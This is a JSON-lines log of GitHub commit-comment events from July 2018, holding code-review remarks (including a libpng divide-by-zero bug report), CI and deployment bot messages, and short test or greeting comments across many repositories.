{"id":"7956278675","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29685360,"position":null,"line":null,"path":null,"commit_id":"e9e54fb97834318eed920835f96cf491b30361ab","created_at":"2018-07-12T13:35:09Z","updated_at":"2018-07-12T13:35:09Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-133508 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-133508\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T13:35:09Z"}
{"id":"7956279004","type":"CommitCommentEvent","actor":{"login":"marceloneil"},"repo":{"name":"curtischong/hackthe6ix17"},"payload":{"comment":{"id":29685363,"position":null,"line":null,"path":null,"commit_id":"e09392006413fa63b7aacab9210da01c66c87c31","created_at":"2018-07-12T13:35:13Z","updated_at":"2018-07-12T13:35:13Z","author_association":"COLLABORATOR","body":"Long term support :stuck_out_tongue: "}},"created_at":"2018-07-12T13:35:13Z"}
{"id":"7956284732","type":"CommitCommentEvent","actor":{"login":"Mil0dV"},"repo":{"name":"Mil0dV/co2ok-plugin-woocommerce"},"payload":{"comment":{"id":29685375,"position":52,"line":362,"path":"co2ok-plugin.php","commit_id":"3a7e6d9b77b99eb167f35de389fff99b4976e831","created_at":"2018-07-12T13:36:12Z","updated_at":"2018-07-12T13:36:12Z","author_association":"OWNER","body":"IMO is dit net iets te voor de hand liggend om te documenteren."}},"created_at":"2018-07-12T13:36:12Z"}
{"id":"7956285377","type":"CommitCommentEvent","actor":{"login":"Polonium-2k"},"repo":{"name":"HelllGuest/helllguest.github.io"},"payload":{"comment":{"id":29685377,"position":null,"line":null,"path":null,"commit_id":"ca60cc4f50153488f7837966a57c09cce5fc88db","created_at":"2018-07-12T13:36:18Z","updated_at":"2018-07-12T13:36:18Z","author_association":"NONE","body":"HEYYYYYY. How are you.\r\nI am sharan/polonium2k\r\n"}},"created_at":"2018-07-12T13:36:18Z"}
{"id":"7956285683","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29685382,"position":null,"line":null,"path":null,"commit_id":"4fb01d8977ceab2284a995d8606a200af4c42ad7","created_at":"2018-07-12T13:36:21Z","updated_at":"2018-07-12T13:36:21Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#ci-192](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#ci-192).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-192-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-12T13:36:21Z"}
{"id":"7956286010","type":"CommitCommentEvent","actor":{"login":"zhangheng1109"},"repo":{"name":"zhangheng1109/zhangheng1109.github.io"},"payload":{"comment":{"id":29685385,"position":null,"line":null,"path":null,"commit_id":"e68da44f4f8df2d840e6ae489ba3c45524d3f112","created_at":"2018-07-12T13:36:24Z","updated_at":"2018-07-12T13:36:24Z","author_association":"OWNER","body":"111"}},"created_at":"2018-07-12T13:36:24Z"}
{"id":"7956286909","type":"CommitCommentEvent","actor":{"login":"jlaine"},"repo":{"name":"onsip/SIP.js"},"payload":{"comment":{"id":29685389,"position":null,"line":null,"path":null,"commit_id":"fcee379530b7dd26a7621228abc14ac4022c65fe","created_at":"2018-07-12T13:36:33Z","updated_at":"2018-07-12T13:36:33Z","author_association":"CONTRIBUTOR","body":"Why aren't we using arrow functions instead of playing around with \"bind\", \"self\" and other nasties?\r\n\r\nThe changes I made a while back to our webpack setup allow us to do so without worrying about whether the browser supports ES6: the code is transpiled."}},"created_at":"2018-07-12T13:36:33Z"}
{"id":"7956287307","type":"CommitCommentEvent","actor":{"login":"janekptacijarabaci"},"repo":{"name":"janekptacijarabaci/UXP"},"payload":{"comment":{"id":29685391,"position":null,"line":null,"path":null,"commit_id":"6216259f020f6a8df53f7628ce4e1b8218cad470","created_at":"2018-07-12T13:36:38Z","updated_at":"2018-07-12T13:36:38Z","author_association":"OWNER","body":"Tag #629"}},"created_at":"2018-07-12T13:36:38Z"}
{"id":"7956287463","type":"CommitCommentEvent","actor":{"login":"sabberworm"},"repo":{"name":"sabberworm/PHP-CSS-Parser"},"payload":{"comment":{"id":29685392,"position":10,"line":493,"path":"lib/Sabberworm/CSS/Parser.php","commit_id":"92abffafb1190d1c7d169c71e762dc1ac0f91ee4","created_at":"2018-07-12T13:36:39Z","updated_at":"2018-07-12T13:36:39Z","author_association":"OWNER","body":"This line won’t ever consume anything because as long as there is still white-space left, `!$this->comes(']')` will be true… Maybe the following will work:\r\n\r\n```php\r\nprivate function parseLineNameValue() {\r\n\t$this->consume('[');\r\n\t$this->consumeWhiteSpace();\r\n\t$sName = $this->parseIdentifier(false, true);\r\n\t$this->consumeWhiteSpace();\r\n\t$this->consume(']');\r\n\treturn new LineName($sName, $this->iLineNo);\r\n }\r\n ```"}},"created_at":"2018-07-12T13:36:39Z"}
{"id":"7956289933","type":"CommitCommentEvent","actor":{"login":"Mil0dV"},"repo":{"name":"Mil0dV/co2ok-plugin-woocommerce"},"payload":{"comment":{"id":29685398,"position":66,"line":441,"path":"co2ok-plugin.php","commit_id":"3a7e6d9b77b99eb167f35de389fff99b4976e831","created_at":"2018-07-12T13:37:04Z","updated_at":"2018-07-12T13:37:04Z","author_association":"OWNER","body":"Als de order refunded of cancelled is, wordt de transaction juist gedelete ;)"}},"created_at":"2018-07-12T13:37:04Z"}
{"id":"7956291185","type":"CommitCommentEvent","actor":{"login":"wallysonn"},"repo":{"name":"eduardokum/laravel-boleto"},"payload":{"comment":{"id":29685403,"position":null,"line":null,"path":null,"commit_id":"4877150398c45c8c1018f523804ebff7718201cc","created_at":"2018-07-12T13:37:16Z","updated_at":"2018-07-12T13:37:16Z","author_association":"NONE","body":"Olá Eduardo, inclui também o caractere **°**, aquela famosa bolinha de \"GRAU\", tive problema com ela também!"}},"created_at":"2018-07-12T13:37:16Z"}
{"id":"7956292418","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29685407,"position":null,"line":null,"path":null,"commit_id":"642b15cee94c919118bcaf232a275b55134c07ec","created_at":"2018-07-12T13:37:28Z","updated_at":"2018-07-12T13:37:28Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#ci-475](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#ci-475).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-475-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-12T13:37:28Z"}
{"id":"7956294995","type":"CommitCommentEvent","actor":{"login":"pankajchandre30"},"repo":{"name":"lhguestc/AVISPA"},"payload":{"comment":{"id":29685412,"position":null,"line":null,"path":null,"commit_id":"18933805b1985cd7f6e881d61bb39717f40a4060","created_at":"2018-07-12T13:37:53Z","updated_at":"2018-07-12T13:37:53Z","author_association":"NONE","body":"can you provide protocol for attack modelling"}},"created_at":"2018-07-12T13:37:53Z"}
{"id":"7956296385","type":"CommitCommentEvent","actor":{"login":"SundeepB"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685420,"position":2,"line":2,"path":"src/app/reducers/index.js","commit_id":"557bc3f31bec3e0df4d21084dea063e980c765d3","created_at":"2018-07-12T13:38:07Z","updated_at":"2018-07-12T13:38:07Z","author_association":"NONE","body":"I do not see this file in reducers directory"}},"created_at":"2018-07-12T13:38:07Z"}
{"id":"7956297159","type":"CommitCommentEvent","actor":{"login":"rileyberton"},"repo":{"name":"circonus-labs/fq"},"payload":{"comment":{"id":29685422,"position":null,"line":null,"path":null,"commit_id":"972318b1c8354d165ea043fe08bf0eed97dcd809","created_at":"2018-07-12T13:38:15Z","updated_at":"2018-07-12T13:38:15Z","author_association":"MEMBER","body":"I think this should be fixed differently.. I don't understand why I was popping all items from the stack and removing all of them.. we should just be removing until we get below the `stack->max_size`.. plus the `stack->size` decrement was missing.  This was totally broken.  Maybe this block should read:\r\n\r\n``` c\r\nwhile(ck_pr_load_32(&stack->size) > stack->max_size) {\r\n     /* pop a single entry */\r\n     ck_stack_entry_t *ce = ck_stack_pop_mpmc(&stack->stack);\r\n     if (ce != NULL) {\r\n       fq_msg *m = container_of(ce, fq_msg, cleanup_stack_entry);\r\n       free(m);\r\n       ck_pr_dec_32(&stack->size);\r\n     }\r\n   }\r\n```"}},"created_at":"2018-07-12T13:38:15Z"}
{"id":"7956299526","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29685430,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-12T13:38:37Z","updated_at":"2018-07-12T13:38:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T13:38:37Z"}
{"id":"7956304225","type":"CommitCommentEvent","actor":{"login":"SundeepB"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685444,"position":3,"line":3,"path":"src/app/reducers/index.js","commit_id":"557bc3f31bec3e0df4d21084dea063e980c765d3","created_at":"2018-07-12T13:39:23Z","updated_at":"2018-07-12T13:39:23Z","author_association":"NONE","body":"Is there a reason to do `import { default as tasks} from ...` instead of `import tasks from ...` ? Since we already exported default in tasksReducer.js"}},"created_at":"2018-07-12T13:39:23Z"}
{"id":"7956304493","type":"CommitCommentEvent","actor":{"login":"troniac"},"repo":{"name":"LWSS/Fuzion"},"payload":{"comment":{"id":29685445,"position":null,"line":null,"path":null,"commit_id":"3a675c8a5360a437699ff16393c56279db6afeed","created_at":"2018-07-12T13:39:25Z","updated_at":"2018-07-12T13:39:25Z","author_association":"NONE","body":"Great work! This helped alot! Thank you very much!"}},"created_at":"2018-07-12T13:39:25Z"}
{"id":"7956307008","type":"CommitCommentEvent","actor":{"login":"nguyenduong131095"},"repo":{"name":"nguyenduong131095/MCU_study"},"payload":{"comment":{"id":29685451,"position":null,"line":null,"path":null,"commit_id":"7f3c7e37df09064029819a46d6e2e4cc850ff6e8","created_at":"2018-07-12T13:39:52Z","updated_at":"2018-07-12T13:39:52Z","author_association":"OWNER","body":"init commit"}},"created_at":"2018-07-12T13:39:52Z"}
{"id":"7956314234","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29685466,"position":13,"line":23,"path":"kodilla-exception/src/main/java/com/kodilla/exception/test/SearchingFlight.java","commit_id":"b9851ae3eb599cd28f4d8b500ca1007cf81bdbb4","created_at":"2018-07-12T13:41:03Z","updated_at":"2018-07-12T13:41:03Z","author_association":"NONE","body":"Jeden znak = to przypisanie wartości a nie porównanie :)\r\nDodatkowo w if nie powinnaś robić wartość == true, wystarczy samo if (wartosc). Ewentualnie jeśli chcesz porównywać z false to trzeba zrobić negację (symbol !)"}},"created_at":"2018-07-12T13:41:03Z"}
{"id":"7956314504","type":"CommitCommentEvent","actor":{"login":"dmbala"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29685469,"position":null,"line":null,"path":null,"commit_id":"4b222896314c9f07526053efa1c06bf0842aa930","created_at":"2018-07-12T13:41:07Z","updated_at":"2018-07-12T13:41:07Z","author_association":"COLLABORATOR","body":"added working vo link to the slide"}},"created_at":"2018-07-12T13:41:07Z"}
{"id":"7956314671","type":"CommitCommentEvent","actor":{"login":"G0L0L"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685470,"position":2,"line":2,"path":"src/app/reducers/index.js","commit_id":"557bc3f31bec3e0df4d21084dea063e980c765d3","created_at":"2018-07-12T13:41:09Z","updated_at":"2018-07-12T13:41:09Z","author_association":"COLLABORATOR","body":"it's empty, I should remove this line :)"}},"created_at":"2018-07-12T13:41:09Z"}
{"id":"7956319495","type":"CommitCommentEvent","actor":{"login":"egreenmachine"},"repo":{"name":"onsip/SIP.js"},"payload":{"comment":{"id":29685478,"position":null,"line":null,"path":null,"commit_id":"fcee379530b7dd26a7621228abc14ac4022c65fe","created_at":"2018-07-12T13:41:54Z","updated_at":"2018-07-12T13:41:54Z","author_association":"COLLABORATOR","body":"We should. There is really no good reason not to at this point. If we were to do this, we would go through and update the entire project to ES6."}},"created_at":"2018-07-12T13:41:54Z"}
{"id":"7956319576","type":"CommitCommentEvent","actor":{"login":"G0L0L"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685479,"position":3,"line":3,"path":"src/app/reducers/index.js","commit_id":"557bc3f31bec3e0df4d21084dea063e980c765d3","created_at":"2018-07-12T13:41:55Z","updated_at":"2018-07-12T13:41:55Z","author_association":"COLLABORATOR","body":"it doesn't matter. The same thing, but different syntax."}},"created_at":"2018-07-12T13:41:55Z"}
{"id":"7956321433","type":"CommitCommentEvent","actor":{"login":"alfonsogarciacaro"},"repo":{"name":"fable-compiler/Fable"},"payload":{"comment":{"id":29685483,"position":null,"line":null,"path":null,"commit_id":"42dfb21f1b08e815c26aa0ee56434b7b01fd094e","created_at":"2018-07-12T13:42:14Z","updated_at":"2018-07-12T13:42:14Z","author_association":"MEMBER","body":"@ncave I'm still having problems to build the bench app locally, but thanks to your work we can build it in Appveyor again! :tada: Now I can download the artifact and debug to see if I find more problems. Only thing is I had to delete the .sln file because it was causing problems with the auto `dotnet restore` that now Fable is running. I probably need to pass the full project path instead."}},"created_at":"2018-07-12T13:42:14Z"}
{"id":"7956322411","type":"CommitCommentEvent","actor":{"login":"dgutson"},"repo":{"name":"glennrp/libpng"},"payload":{"comment":{"id":29685487,"position":10,"line":3174,"path":"pngrutil.c","commit_id":"8a05766cb74af05c04c53e6c9d60c13fc4d59bf2","created_at":"2018-07-12T13:42:24Z","updated_at":"2018-07-12T13:42:24Z","author_association":"NONE","body":"You can still get a 0 with the following values:\r\n```c\r\npng_ptr->width = (size_t)-1;\r\npng_ptr->channels = 1;\r\npng_ptr->bit_depth = 1;\r\npng_ptr->interlaced = 0;\r\n```"}},"created_at":"2018-07-12T13:42:24Z"}
{"id":"7956323671","type":"CommitCommentEvent","actor":{"login":"eyeonus"},"repo":{"name":"eyeonus/Trade-Dangerous"},"payload":{"comment":{"id":29685497,"position":null,"line":null,"path":null,"commit_id":"7a6e25f91f29be60aa23949ee465a727cf6c75b4","created_at":"2018-07-12T13:42:37Z","updated_at":"2018-07-12T13:42:37Z","author_association":"OWNER","body":"Should fix #15"}},"created_at":"2018-07-12T13:42:37Z"}
{"id":"7956326546","type":"CommitCommentEvent","actor":{"login":"dgutson"},"repo":{"name":"glennrp/libpng"},"payload":{"comment":{"id":29685504,"position":11,"line":3175,"path":"pngrutil.c","commit_id":"8a05766cb74af05c04c53e6c9d60c13fc4d59bf2","created_at":"2018-07-12T13:43:07Z","updated_at":"2018-07-12T13:43:07Z","author_association":"NONE","body":"..so I suggest to add a sanitizing check here that row_factor > 0 before doing the division."}},"created_at":"2018-07-12T13:43:07Z"}
{"id":"7956333726","type":"CommitCommentEvent","actor":{"login":"Konarek"},"repo":{"name":"Konarek/WorldCup"},"payload":{"comment":{"id":29685518,"position":null,"line":null,"path":null,"commit_id":"c98d86c79e5b581033aa3ce7bff484423512f28e","created_at":"2018-07-12T13:44:17Z","updated_at":"2018-07-12T13:44:17Z","author_association":"OWNER","body":".."}},"created_at":"2018-07-12T13:44:17Z"}
{"id":"7956334745","type":"CommitCommentEvent","actor":{"login":"Ab681100"},"repo":{"name":"autopear/Cydia"},"payload":{"comment":{"id":29685521,"position":1,"line":1,"path":"makefile","commit_id":"1f5a6223a4be43abb2338b14c9bee466b45caf92","created_at":"2018-07-12T13:44:26Z","updated_at":"2018-07-12T13:44:26Z","author_association":"NONE","body":"1f5a622"}},"created_at":"2018-07-12T13:44:26Z"}
{"id":"7956334900","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29685523,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-12T13:44:27Z","updated_at":"2018-07-12T13:44:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T13:44:27Z"}
{"id":"7956335229","type":"CommitCommentEvent","actor":{"login":"da-snap"},"repo":{"name":"modell-aachen/VueJSPlugin"},"payload":{"comment":{"id":29685527,"position":33,"line":162,"path":"dev/components/vue-select/components/Select.vue","commit_id":"aad22c3c9ac37276c8cfa76ab4b52d1b32157ab2","created_at":"2018-07-12T13:44:31Z","updated_at":"2018-07-12T13:44:31Z","author_association":"CONTRIBUTOR","body":"würde ich eher widthGroup /widthClass nennen. Bei width würde ich direkt erwarten, dass ich eine px-Zahl angeben kann."}},"created_at":"2018-07-12T13:44:31Z"}
{"id":"7956336705","type":"CommitCommentEvent","actor":{"login":"MangelMaxime"},"repo":{"name":"fable-compiler/Fable"},"payload":{"comment":{"id":29685530,"position":null,"line":null,"path":null,"commit_id":"42dfb21f1b08e815c26aa0ee56434b7b01fd094e","created_at":"2018-07-12T13:44:44Z","updated_at":"2018-07-12T13:44:44Z","author_association":"MEMBER","body":"@alfonsogarciacaro Yes I think you need the full path.\r\n\r\nOtherwise by default dotnet will look in the current working dir."}},"created_at":"2018-07-12T13:44:44Z"}
{"id":"7956337054","type":"CommitCommentEvent","actor":{"login":"oomek"},"repo":{"name":"mickelson/attract"},"payload":{"comment":{"id":29685532,"position":null,"line":null,"path":null,"commit_id":"2ce5d1e881609945928829d5b5888b764cc4ad08","created_at":"2018-07-12T13:44:48Z","updated_at":"2018-07-12T13:44:48Z","author_association":"CONTRIBUTOR","body":"Would you be able to hold up a release based on SFML 2.4.0 by any chance?\r\nThere is a bug in glyph class that disabled the smoothing of glyphs.\r\nThe result of that causes loosing sub-pixel positioning of text and glyph clipping appears when scrolling slowly with sub-pixel precision. Also when you zoom the text with shader the text is pixelated.\r\nI've fixed it in my commit below, It has been approved, but not merged yet.\r\nhttps://github.com/SFML/SFML/pull/1452/files\r\n\r\nWhat do you think we could do in this case? What I did is I made a bash file compiling SFML from my fork before building AM. Could we do that officially? I mean release the windows build based on SFML from my fork."}},"created_at":"2018-07-12T13:44:48Z"}
{"id":"7956338007","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/onebox"},"payload":{"comment":{"id":29685534,"position":null,"line":null,"path":null,"commit_id":"b8faf57d5d1e7de064aa9d5676ae98b076ad3f84","created_at":"2018-07-12T13:44:57Z","updated_at":"2018-07-12T13:44:57Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/onebox-preview-for-typeform-steals-focus/90948/15\n"}},"created_at":"2018-07-12T13:44:57Z"}
{"id":"7956341902","type":"CommitCommentEvent","actor":{"login":"harveyslash"},"repo":{"name":"harveyslash/sympyle"},"payload":{"comment":{"id":29685540,"position":null,"line":null,"path":null,"commit_id":"54cf3c4b2c95f1707d22f8bf4a8986ce26036a49","created_at":"2018-07-12T13:45:34Z","updated_at":"2018-07-12T13:45:34Z","author_association":"OWNER","body":"[CodeFactor](https://www.codefactor.io/repository/github/harveyslash/sympyle/overview/master) found an issue: Empty class docstring\n\nIt's currently on:\n[sympyle\\Ops\\SoftmaxWithCrossEntropy.py:7\n](https://www.codefactor.io/repository/github/harveyslash/sympyle/source/master/sympyle/Ops/SoftmaxWithCrossEntropy.py#L7)Commit 54cf3c4b2c95f1707d22f8bf4a8986ce26036a49"}},"created_at":"2018-07-12T13:45:34Z"}
{"id":"7956342442","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29685542,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-12T13:45:39Z","updated_at":"2018-07-12T13:45:39Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T13:45:39Z"}
{"id":"7956345047","type":"CommitCommentEvent","actor":{"login":"ci010"},"repo":{"name":"PhoebezZ/Developer-Connector"},"payload":{"comment":{"id":29685548,"position":3,"line":3,"path":"models/User.js","commit_id":"b36ce0c00dbe90c9483fd4245e70a1c7a41d344e","created_at":"2018-07-12T13:46:04Z","updated_at":"2018-07-12T13:46:04Z","author_association":"NONE","body":"不考虑试试graphql吗hhhh"}},"created_at":"2018-07-12T13:46:04Z"}
{"id":"7956345617","type":"CommitCommentEvent","actor":{"login":"yannanzheng"},"repo":{"name":"yannanzheng/yannanzheng.github.io"},"payload":{"comment":{"id":29685550,"position":null,"line":null,"path":null,"commit_id":"b2dc4210f97bf37507a40d9893b0a92a2c9fb9ab","created_at":"2018-07-12T13:46:10Z","updated_at":"2018-07-12T13:46:10Z","author_association":"OWNER","body":"#hello\r\n##I am happy today！"}},"created_at":"2018-07-12T13:46:10Z"}
{"id":"7956348159","type":"CommitCommentEvent","actor":{"login":"alfonsogarciacaro"},"repo":{"name":"fable-compiler/Fable"},"payload":{"comment":{"id":29685553,"position":null,"line":null,"path":null,"commit_id":"42dfb21f1b08e815c26aa0ee56434b7b01fd094e","created_at":"2018-07-12T13:46:33Z","updated_at":"2018-07-12T13:46:33Z","author_association":"MEMBER","body":"I'm setting the working dir to the project directory, but the problem here is there was also a solution file, and that one takes precedence."}},"created_at":"2018-07-12T13:46:33Z"}
{"id":"7956350947","type":"CommitCommentEvent","actor":{"login":"SundeepB"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685564,"position":19,"line":17,"path":"src/app/reducers/tasksReducer.js","commit_id":"557bc3f31bec3e0df4d21084dea063e980c765d3","created_at":"2018-07-12T13:47:00Z","updated_at":"2018-07-12T13:47:00Z","author_association":"NONE","body":"I couldn't find any reference to this `state.update` method in the documentation. Can you help me find it? In all the examples I see, new object is created and returned."}},"created_at":"2018-07-12T13:47:00Z"}
{"id":"7956355483","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/riveralive-cms"},"payload":{"comment":{"id":29685576,"position":null,"line":null,"path":null,"commit_id":"a88a791cf85557b532d5b3a984003c630f787b95","created_at":"2018-07-12T13:47:45Z","updated_at":"2018-07-12T13:47:45Z","author_association":"MEMBER","body":"Created multidev environment [riveralive-cms#ci-193](https://dashboard.pantheon.io/sites/ced938b0-bbbf-4ed2-ba1c-98b66d8ba2be#ci-193).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-193-riveralive-cms.pantheonsite.io/)"}},"created_at":"2018-07-12T13:47:45Z"}
{"id":"7956356570","type":"CommitCommentEvent","actor":{"login":"G0L0L"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685578,"position":19,"line":17,"path":"src/app/reducers/tasksReducer.js","commit_id":"557bc3f31bec3e0df4d21084dea063e980c765d3","created_at":"2018-07-12T13:47:56Z","updated_at":"2018-07-12T13:47:56Z","author_association":"COLLABORATOR","body":"https://facebook.github.io/immutable-js/docs/#/Map/update"}},"created_at":"2018-07-12T13:47:56Z"}
{"id":"7956359633","type":"CommitCommentEvent","actor":{"login":"SimonFabRoth"},"repo":{"name":"SimonFabRoth/HelloWorld"},"payload":{"comment":{"id":29685586,"position":null,"line":null,"path":null,"commit_id":"59dae7f1f20dc103c2157f17daddd7a5f30b579d","created_at":"2018-07-12T13:48:25Z","updated_at":"2018-07-12T13:48:25Z","author_association":"OWNER","body":"Chage"}},"created_at":"2018-07-12T13:48:25Z"}
{"id":"7956362354","type":"CommitCommentEvent","actor":{"login":"da-snap"},"repo":{"name":"modell-aachen/WorkflowAppPlugin"},"payload":{"comment":{"id":29685595,"position":30,"line":16,"path":"dev/configurator/components/table-editor/TableEditor.vue","commit_id":"8db806e53d1f803882b8a4c0af2be0a18f5ce5cc","created_at":"2018-07-12T13:48:53Z","updated_at":"2018-07-12T13:48:53Z","author_association":"CONTRIBUTOR","body":"Du kannst auch `width=\"xs\"` schreiben."}},"created_at":"2018-07-12T13:48:53Z"}
{"id":"7956364056","type":"CommitCommentEvent","actor":{"login":"ncave"},"repo":{"name":"fable-compiler/Fable"},"payload":{"comment":{"id":29685599,"position":null,"line":null,"path":null,"commit_id":"42dfb21f1b08e815c26aa0ee56434b7b01fd094e","created_at":"2018-07-12T13:49:10Z","updated_at":"2018-07-12T13:49:10Z","author_association":"COLLABORATOR","body":"@alfonsogarciacaro that's fine, we don't need the solution file, it's more for local dev."}},"created_at":"2018-07-12T13:49:10Z"}
{"id":"7956365158","type":"CommitCommentEvent","actor":{"login":"ricardoaguirre"},"repo":{"name":"omerkun/PyPerv"},"payload":{"comment":{"id":29685602,"position":null,"line":null,"path":null,"commit_id":"68e9b20547f388b6ce3e54524239574425f17ba8","created_at":"2018-07-12T13:49:20Z","updated_at":"2018-07-12T13:49:20Z","author_association":"NONE","body":"What happened to FuFuFuu?"}},"created_at":"2018-07-12T13:49:20Z"}
{"id":"7956367581","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29685607,"position":null,"line":null,"path":null,"commit_id":"80b4988fd7b6b53456745aa7556eb22f526f4c6c","created_at":"2018-07-12T13:49:45Z","updated_at":"2018-07-12T13:49:45Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180712-134944 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180712-134944\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-12T13:49:45Z"}
